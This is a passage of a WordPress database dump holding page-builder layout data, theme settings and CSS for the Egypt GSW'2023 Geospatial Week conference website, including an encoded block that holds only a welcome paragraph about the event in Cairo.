bg_override=\\\"ex-full\\\" enable_overlay=\\\"enable_overlay_value\\\" overlay_color=\\\"rgba(0,0,0,0.6)\\\" type=\\\"vc_default\\\" css=\\\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\\\"][vc_column width=\\\"5\\/6\\\" offset=\\\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\\\" el_class=\\\"text-centered\\\"][ultimate_heading main_heading=\\\"REGISTRATION FEES\\\" main_heading_color=\\\"#ffffff\\\" sub_heading_color=\\\"#ffffff\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"120\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:50px;\\\" margin_design_tab_text=\\\"\\\"]Opening of registration platform: soon[\\/ultimate_heading][dt_default_button link=\\\"url:%2Fsoftware-company%2Fshowcase%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]INFORMATION[\\/dt_default_button][dt_default_button link=\\\"url:%2Fsoftware-company%2Fcontact%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]CONTACT US[\\/dt_default_button][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"grad\\\" bg_override=\\\"ex-full\\\" type=\\\"vc_default\\\" margin_top=\\\"-50\\\" css=\\\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\\\" bg_grad=\\\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\\\"][vc_column offset=\\\"vc_col-lg-12 vc_col-md-12\\\"][ultimate_heading main_heading=\\\"GSW\'2023 By\\\" main_heading_color=\\\"#ffffff\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" margin_design_tab_text=\\\"\\\"][\\/ultimate_heading][dt_team_masonry img_border_radius=\\\"0px\\\" bwb_columns=\\\"desktop:2|h_tablet:2|v_tablet:2|phone:1\\\" post_title_bottom_margin=\\\"0px\\\" soc_icon_border_width=\\\"0px\\\" soc_icon_color=\\\"#ffffff\\\" posts_offset=\\\"0\\\" category=\\\"\\\"][\\/vc_column][\\/vc_row]<\\/p>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3bd334\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5f86e4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fc561a1\",\"elType\":\"widget\",\"settings\":{\"read_more_button_text\":\"Read more\",\"filter_all_text\":\"View all\",\"pagination_load_more_text\":\"Load more\",\"post_meta_separator\":\"\\u2022\"},\"elements\":[],\"widgetType\":\"the7_elements\"}],\"isInner\":false}],\"isInner\":false}]'),
(5922,2379,'_elementor_page_assets','a:0:{}'),
(5923,2379,'_elementor_css','a:6:{s:4:\"time\";i:1665108160;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:2:{i:0;s:8:\"fa-solid\";i:1;s:10:\"the7-icons\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),
(6020,2381,'_elementor_edit_mode','builder'),
(6021,2381,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}.vc_custom_1665131484276{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665135361340{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(6022,2381,'_wp_page_template','default'),
(6023,2381,'_elementor_template_type','wp-page'),
(6024,2381,'_elementor_version','3.7.8'),
(6025,2381,'_elementor_data','[{\"id\":\"38ea82b7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"49efd0ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23e903ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[vc_row equal_height=\\\"yes\\\" content_placement=\\\"middle\\\" type=\\\"vc_default\\\" margin_top=\\\"5\\\" margin_bottom=\\\"10\\\" css=\\\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\\\"][vc_column parallax=\\\"content-moving\\\" offset=\\\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\\\"][ultimate_heading main_heading=\\\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\\\" sub_heading_color=\\\"#333333\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"150\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:70px;\\\"][\\/ultimate_heading][vc_row_inner css=\\\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\\\"][vc_column_inner width=\\\"5\\/12\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2271|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\\\" img_width=\\\"100\\\" title=\\\"Prof. Ismail AbdelGhafar\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport<\\/strong><\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][vc_column_inner width=\\\"1\\/3\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2272|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\\\" img_width=\\\"100\\\" icon_style=\\\"advanced\\\" icon_border_spacing=\\\"100\\\" title=\\\"Prof. Naser El-Sheimy\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6>Geospatial Week Director ,The University of Calgary<\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][\\/vc_row_inner][\\/vc_column][\\/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[\\/vc_raw_html][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"image\\\" parallax_style=\\\"vcpb-vz-jquery\\\" bg_image_new=\\\"id^1900|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/06\\/trade10.jpg|caption^null|alt^null|title^trade10|description^null\\\" parallax_sense=\\\"40\\\" bg_override=\\\"ex-full\\\" enable_overlay=\\\"enable_overlay_value\\\" overlay_color=\\\"rgba(0,0,0,0.6)\\\" type=\\\"vc_default\\\" css=\\\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\\\"][vc_column width=\\\"5\\/6\\\" offset=\\\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\\\" el_class=\\\"text-centered\\\"][ultimate_heading main_heading=\\\"REGISTRATION FEES\\\" main_heading_color=\\\"#ffffff\\\" sub_heading_color=\\\"#ffffff\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"120\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:50px;\\\" margin_design_tab_text=\\\"\\\"]Opening of registration platform: soon[\\/ultimate_heading][dt_default_button link=\\\"url:%2Fsoftware-company%2Fshowcase%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]INFORMATION[\\/dt_default_button][dt_default_button link=\\\"url:%2Fsoftware-company%2Fcontact%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]CONTACT US[\\/dt_default_button][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"grad\\\" bg_override=\\\"ex-full\\\" type=\\\"vc_default\\\" margin_top=\\\"-50\\\" css=\\\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\\\" bg_grad=\\\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\\\"][vc_column offset=\\\"vc_col-lg-12 vc_col-md-12\\\"][ultimate_heading main_heading=\\\"GSW\'2023 By\\\" main_heading_color=\\\"#ffffff\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" margin_design_tab_text=\\\"\\\"][\\/ultimate_heading][dt_team_masonry img_border_radius=\\\"0px\\\" bwb_columns=\\\"desktop:2|h_tablet:2|v_tablet:2|phone:1\\\" post_title_bottom_margin=\\\"0px\\\" soc_icon_border_width=\\\"0px\\\" soc_icon_color=\\\"#ffffff\\\" posts_offset=\\\"0\\\" category=\\\"\\\"][\\/vc_column][\\/vc_row]<\\/p>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3bd334\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5f86e4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fc561a1\",\"elType\":\"widget\",\"settings\":{\"read_more_button_text\":\"Read more\",\"filter_all_text\":\"View all\",\"pagination_load_more_text\":\"Load more\",\"post_meta_separator\":\"\\u2022\"},\"elements\":[],\"widgetType\":\"the7_elements\"}],\"isInner\":false}],\"isInner\":false}]'),
(6026,2381,'_elementor_page_assets','a:0:{}'),
(6027,2381,'_elementor_css','a:6:{s:4:\"time\";i:1665108160;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:2:{i:0;s:8:\"fa-solid\";i:1;s:10:\"the7-icons\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),
(6028,2167,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(6029,2167,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(6030,2167,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(6031,2167,'_wp_page_template','default'),
(6032,2167,'_wpb_vc_js_status','true'),
(6033,2167,'_dt_sidebar_position','disabled'),
(6034,2167,'_dt_sidebar_widgetarea_id','sidebar_1'),
(6035,2167,'_dt_sidebar_hide_on_mobile','0'),
(6036,2167,'_dt_footer_show','0'),
(6037,2167,'_dt_footer_widgetarea_id','give-forms-sidebar'),
(6038,2167,'_dt_footer_hide_on_mobile','1'),
(6039,2167,'_dt_header_title','slideshow'),
(6040,2167,'_dt_header_background','normal'),
(6041,2167,'_dt_header_background_below_slideshow','disabled'),
(6042,2167,'_dt_header_transparent_bg_color','#000000'),
(6043,2167,'_dt_header_transparent_bg_opacity','50'),
(6044,2167,'_dt_header_transparent_bg_color_scheme','light'),
(6045,2167,'_dt_slideshow_mode','revolution'),
(6046,2167,'_dt_slideshow_layout','fullwidth'),
(6047,2167,'_dt_slideshow_slider_proportions','a:2:{s:5:\"width\";s:4:\"1200\";s:6:\"height\";s:3:\"500\";}'),
(6048,2167,'_dt_slideshow_scaling','fill'),
(6049,2167,'_dt_slideshow_autoplay','paused'),
(6050,2167,'_dt_slideshow_autoslide_interval','5000'),
(6051,2167,'_dt_slideshow_hide_captions','0'),
(6052,2167,'_dt_slideshow_photo_scroller_layout','fullscreen'),
(6053,2167,'_dt_slideshow_photo_scroller_bg_color','#000000'),
(6054,2167,'_dt_slideshow_photo_scroller_overlay','1'),
(6055,2167,'_dt_slideshow_photo_scroller_top_padding','0'),
(6056,2167,'_dt_slideshow_photo_scroller_bottom_padding','0'),
(6057,2167,'_dt_slideshow_photo_scroller_side_paddings','0'),
(6058,2167,'_dt_slideshow_photo_scroller_inactive_opacity','15'),
(6059,2167,'_dt_slideshow_photo_scroller_thumbnails_visibility','show'),
(6060,2167,'_dt_slideshow_photo_scroller_thumbnails_height','85'),
(6061,2167,'_dt_slideshow_photo_scroller_autoplay','play'),
(6062,2167,'_dt_slideshow_photo_scroller_autoplay_speed','4000'),
(6063,2167,'_dt_slideshow_photo_scroller_ls_max_width','100'),
(6064,2167,'_dt_slideshow_photo_scroller_ls_min_width','0'),
(6065,2167,'_dt_slideshow_photo_scroller_ls_fill_dt','fit'),
(6066,2167,'_dt_slideshow_photo_scroller_ls_fill_mob','fit'),
(6067,2167,'_dt_slideshow_photo_scroller_pt_max_width','100'),
(6068,2167,'_dt_slideshow_photo_scroller_pt_min_width','0'),
(6069,2167,'_dt_slideshow_photo_scroller_pt_fill_dt','fit'),
(6070,2167,'_dt_slideshow_photo_scroller_pt_fill_mob','fit'),
(6071,2167,'_dt_slideshow_revolution_slider','the7-software-company-slider'),
(6072,2167,'_dt_slideshow_layer_slider','none'),
(6073,2167,'_dt_slideshow_layer_show_bg_and_paddings','0'),
(6074,2167,'_dt_header_disabled_background','normal'),
(6075,2167,'_dt_header_disabled_transparent_bg_color','#000000'),
(6076,2167,'_oembed_f4fe2fa3a211d012858d7099685cac4c','<iframe width=\"1200\" height=\"900\" src=\"https://www.youtube.com/embed/KuVcuTYWPHE?feature=oembed\" frameborder=\"0\" allowfullscreen></iframe>'),
(6077,2167,'_oembed_time_f4fe2fa3a211d012858d7099685cac4c','1455271357'),
(6078,2167,'_dt_page_overrides_top_margin','0px'),
(6079,2167,'_dt_page_overrides_bottom_margin','0px'),
(6080,2167,'_dt_header_disabled_transparent_bg_opacity','50'),
(6081,2167,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(6082,2167,'_dt_header_transparent_top_bar_bg_opacity','25'),
(6083,2167,'_dt_slideshow_photo_scroller_thumbnails_width',''),
(6084,2167,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(6085,2167,'fake_id',''),
(6086,2167,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(6087,2167,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(6088,2167,'the7_shortcodes_inline_css','.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-bg-on.classic-layout-list article {\r\n  background: #f7f7f7;\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.dividers-on.classic-layout-list article {\r\n  margin-top: ;\r\n  padding-top: 0;\r\n  border-color: ;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.dividers-on.classic-layout-list article:first-of-type {\r\n  margin-top: 0;\r\n  padding-top: 0;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.classic-layout-list.mode-list .post-thumbnail-wrap {\r\n  width: ;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.classic-layout-list.mode-list .post-entry-content {\r\n  width: calc(100% - );\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.classic-layout-list.mode-list .no-img .post-entry-content {\r\n  width: 100%;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.bottom-overlap-layout-list .post-entry-content {\r\n  margin-top: -100px;\r\n  width: 75%;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.bottom-overlap-layout-list:not(.mode-list) .no-img .post-entry-content {\r\n  margin-top: 0;\r\n  width: 100%;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.bottom-overlap-layout-list.mode-list .no-img .post-entry-content {\r\n  margin-top: 0;\r\n}\r\n#page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-bg-on.gradient-overlap-layout-list .post-entry-content {\r\n  background: linear-gradient(to bottom,#f7f7f7,#f7f7f7) no-repeat 0px 150px;\r\n}\r\n#page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-bg-on.gradient-overlap-layout-list .post-entry-content:before {\r\n  background: #f7f7f7;\r\n  background: -moz-linear-gradient(top,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n  background: -webkit-linear-gradient(top,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n  background: linear-gradient(to bottom,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n}\r\n#page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-bg-on.gradient-overlap-layout-list .no-img .post-entry-content {\r\n  background: #f7f7f7;\r\n  padding: 30px 30px 30px 30px;\r\n}\r\n#page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-bg-on.gradient-overlap-layout-list .no-img .post-entry-content:before {\r\n  display: none;\r\n}\r\n#page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.gradient-overlay-layout-list .post-entry-content {\r\n  background: #f7f7f7;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.gradient-overlay-layout-list:not(.portfolio-shortcode):not(.albums-shortcode) .post-entry-content {\r\n  top: 0px;\r\n  right: 0px;\r\n  bottom: 0px;\r\n  left: 0px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.gradient-overlay-layout-list 